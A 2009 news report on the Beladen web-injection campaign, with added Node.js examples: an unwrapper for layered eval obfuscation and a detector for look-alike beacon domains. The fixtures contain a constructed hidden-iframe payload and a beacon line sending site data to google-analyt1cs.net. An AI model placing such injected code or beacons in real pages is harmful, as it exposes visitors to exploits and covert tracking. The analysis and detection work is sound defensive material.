Malicious injected JavaScript code tries to exploit visitors

Jun 3, 2009 10:25 GMT  ·  By

Researchers from Internet security vendor Websense warn of a new wave of web attacks that has compromised some 40,000 websites. The threat injects obfuscated, malicious JavaScript into the affected pages; that code then loads and attempts to run numerous exploits hosted on a third-party server.

According to the company, these attacks are distinct from the Gumblar and Martuz campaigns that have aggressively hit the web recently. It is still unclear how the websites are being compromised, since no common point of entry has been determined yet, which leaves researchers speculating that stolen FTP credentials could be at fault, as they were in the Gumblar attacks.

The injected JavaScript code is hidden through complex obfuscation techniques. "The malicious code injected in the Beladen attacks uses an obfuscation method that starts with the initialization of a long, obfuscated string parameter. This gets de-obfuscated and then executed by the browser. This kind of obfuscation can employ many levels of obfuscation - where obfuscated code leads to more obfuscated code, and so on," explains Elad Sharf, security researcher at Websense.
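The layered string-then-eval scheme Sharf describes can be peeled mechanically. The following Node.js script is an added example, not code from the article or from Websense: it runs each layer with `eval` and `Function` replaced by a recorder, so whatever the layer tries to execute is captured as text instead of run, and that text becomes the next layer. The three-layer sample, its payload and the `loader.invalid` / `victim.invalid` hostnames are constructed for the example and are not the real Beladen code.

```javascript
// Added example, not code from the article or from Websense: an "eval-hooking"
// unwrapper for layered JavaScript obfuscation. The sample it peels is
// constructed here (payload -> charcode layer -> hex-string layer) to stand in
// for the real Beladen injection, which is not reproduced on this page.

// Innermost layer: the code the attacker finally wants the browser to run.
// The iframe host is a placeholder, not a real exploit server.
const PAYLOAD = "document.write('<iframe src=\"http://loader.invalid/\" width=0 height=0></iframe>');";

// Wrap a string so that it is rebuilt with String.fromCharCode and eval'd.
function toCharCodeLayer(src) {
  const codes = Array.from(src, c => c.charCodeAt(0)).join(',');
  return 'eval(String.fromCharCode(' + codes + '));';
}

// Wrap a string as one long \xNN-escaped literal that is assigned and eval'd,
// the "long obfuscated string parameter" shape described in the article.
function toHexStringLayer(src) {
  const hex = Array.from(src, c => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
  return 'var s="' + hex + '";eval(s);';
}

const SAMPLE = toHexStringLayer(toCharCodeLayer(PAYLOAD));

// Peel the layers: run each one with eval/Function replaced by a recorder, so
// whatever the layer tries to execute is captured as text instead of run.
function unwrap(code, maxDepth = 10) {
  const layers = [code];
  const writes = [];          // anything the code hands to document.write
  let error = null;
  let current = code;
  for (let depth = 0; depth < maxDepth; depth++) {
    const captured = [];
    // Record the string; return a no-op so "Function(src)()" style calls do not throw.
    const hook = src => { captured.push(String(src)); return () => undefined; };
    const doc = { write: html => { writes.push(String(html)); },
                  location: { hostname: 'victim.invalid' } };
    const win = { eval: hook, Function: hook, document: doc };
    try {
      // Parameters named eval/Function shadow the real ones. Function() bodies
      // are sloppy-mode, which is what allows a parameter to be called eval.
      const run = new Function('eval', 'Function', 'document', 'window', current);
      run(hook, hook, doc, win);
    } catch (err) {
      error = 'layer ' + depth + ' threw: ' + err.message;
      break;
    }
    if (captured.length === 0) break;   // nothing more to decode: deepest layer reached
    current = captured[captured.length - 1];
    layers.push(current);
  }
  return { layers, writes, error };
}

// Usage: const result = unwrap(SAMPLE); the last entry of result.layers is the payload.
```

The last entry of `layers` is the de-obfuscated payload and `writes` shows what it would have injected into the page. Real samples also reach `eval` through aliases such as `window["ev"+"al"]`, `setTimeout` with a string argument, or `document.write` of a further `<script>`, so a production unwrapper hooks those sinks as well. Note that `new Function` runs the sample inside the analyst's own process; do this in a throwaway VM, never on a workstation holding real credentials.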

The threat is named after the domain that serves the actual malicious payload, the exploits themselves: beladen.net. Beladen is the German word for "loaded" and, as Stephan Chenette, a senior security researcher at Websense, puts it, "That's appropriate because these hacked sites are absolutely loaded with almost every single exploit you can find publicly available right now."

As a result, visitors to the compromised websites are served a flurry of exploits for vulnerabilities in a wide range of software installed on their computers, from browsers such as Firefox and Internet Explorer to Adobe Reader, Flash Player, QuickTime and WinZip. Since a large share of users fail to keep their software up to date, such an attack can achieve a high success rate.

According to The Register, most of the compromised websites observed by Websense belong to small companies or government institutions, which, unfortunately, generally did not respond to the notifications sent by researchers.

In addition to launching exploits, the injected JavaScript code also gathers statistics about visitors. Parts of the code extract the name of the compromised website on which the user has landed, as well as the date and time of the visit, and send this information to a script on google-analyt1cs.net, a look-alike of Google's legitimate google-analytics.com domain. This domain name has previously been associated with the Russian Business Network (RBN), an infamous organized cybercriminal group, which might be making a comeback.
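The beacon described above can be spotted from the page side, because its hostname mimics a brand that the site already loads from. The following Node.js script is an added example, not code from the article or from Websense: it scans a page's HTML for URLs and reduces the brand label of every host, and of a small allowlist, to a common "skeleton" in which digits that attackers substitute for letters (1 for i or l, 0 for o, and so on) compare equal. The infected page, its beacon script and the allowlist are constructed for the example and are not the real injected code.

```javascript
// Added example, not code from the article or from Websense: flag beacon URLs
// that point at look-alike hostnames such as google-analyt1cs.net. The page
// below is constructed to match the article's description of the beacon; it
// is not the real injected code, and the allowlist is assumed.

const SAMPLE_HTML = `
<script src="https://www.google-analytics.com/ga.js"></script>
<script>
var h=document.location.hostname,t=new Date().toUTCString();
(new Image).src="http://google-analyt1cs.net/stats.php?site="+h+"&t="+t;
</script>
<script src="http://cdn.example.com/app.js"></script>`;

// Hosts this site legitimately loads from (assumed for the example).
const TRUSTED_HOSTS = ['www.google-analytics.com', 'cdn.example.com'];

// Digits commonly swapped in for letters. Reducing both the candidate and the
// trusted brand to the same "skeleton" makes google-analyt1cs equal google-analytics.
const CONFUSABLES = { '0': 'o', '1': 'l', 'i': 'l', '3': 'e', '4': 'a', '5': 's', '7': 't' };

function skeleton(label) {
  return label.toLowerCase().replace(/[01i3457]/g, ch => CONFUSABLES[ch]);
}

// Naive split on dots: the last two labels form the registrable domain and the
// label before the TLD is the "brand". Real code would use the public suffix list.
function registrableDomain(hostname) {
  return hostname.split('.').slice(-2).join('.');
}
function brandLabel(hostname) {
  const parts = hostname.split('.');
  return parts.length >= 2 ? parts[parts.length - 2] : hostname;
}

// Pull every absolute http(s) URL out of the markup, inline scripts included.
function extractUrls(html) {
  return html.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Report URLs whose host is not from a trusted organisation but whose brand
// label collapses to the same skeleton as a trusted host's brand label.
function findLookalikeBeacons(html, trustedHosts) {
  const trustedDomains = new Set(trustedHosts.map(registrableDomain));
  const bySkeleton = new Map();             // skeleton(brand) -> trusted host
  for (const h of trustedHosts) bySkeleton.set(skeleton(brandLabel(h)), h);

  const findings = [];
  for (const url of extractUrls(html)) {
    let host;
    try { host = new URL(url).hostname.toLowerCase(); } catch (e) { continue; }
    if (trustedDomains.has(registrableDomain(host))) continue;   // same organisation, not a look-alike
    const impersonates = bySkeleton.get(skeleton(brandLabel(host)));
    if (impersonates) findings.push({ url, host, impersonates });
  }
  return findings;
}

// Usage: findLookalikeBeacons(SAMPLE_HTML, TRUSTED_HOSTS) reports only the google-analyt1cs.net beacon.
```

Only the `google-analyt1cs.net` URL is reported, attributed to `www.google-analytics.com`; a host such as `ssl.google-analytics.com` passes because it shares the trusted registrable domain. The skeleton map covers digit substitutions only; a fuller check adds Unicode confusables and the public suffix list, and pairs the scan with a diff of the page against a known-good copy so the injected script itself, not just its beacon, is caught.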